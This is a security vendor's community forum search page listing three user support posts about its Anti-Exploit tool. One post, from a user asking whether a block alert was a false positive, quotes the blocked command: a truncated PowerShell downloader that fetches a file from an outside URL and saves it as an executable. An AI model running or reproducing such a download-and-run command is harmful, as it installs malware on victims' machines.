Jump to content

Search the Community

Showing results for tags 'Anti-Exploit'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 3 results

  1. I tried to start the program for testing if Anti-Expliot works, But it say that MSVCR100.dll is missing. OS: Windows 10 Pro x64 OS Version: 1909 ( 18363.535 ) No idea why this occur.
  2. Everytime I restart my computer these checkboxes are left unchecked. If I re-check them and hit apply, then look again after they are still checked. This ends on restart. Please help! I can upload logs or whatever files needed. Thanks!
  3. When trying to open a file in Word that I downloaded via email, I get a pop-up saying that Malwarebytes Anti-Exploit has blocked an exploit attempt. Application: cmd Protection Layer: Application Behavior Protection Protection Technique: Exploit payload process blocked File/Process Blocked: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $FPF=new-object Net.WebClient$uIo='http:\potuansdqwbe.com\YUY\huonasdh.php?l=dg3.tkn'.Split('@')$tWW = '39'$rsf=$env:public+'\'+$tWW+'.exe'foreach($srf in $uIo){try{$FPF.DownloadFile($sr Attacking URL: N/A I've attached the logs from the PC. I'm not sure if this is an actual threat or Anti-Exploit flagging things as false-positives. Any help would be appreciated. Malwarebytes Anti-Exploit.zip
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.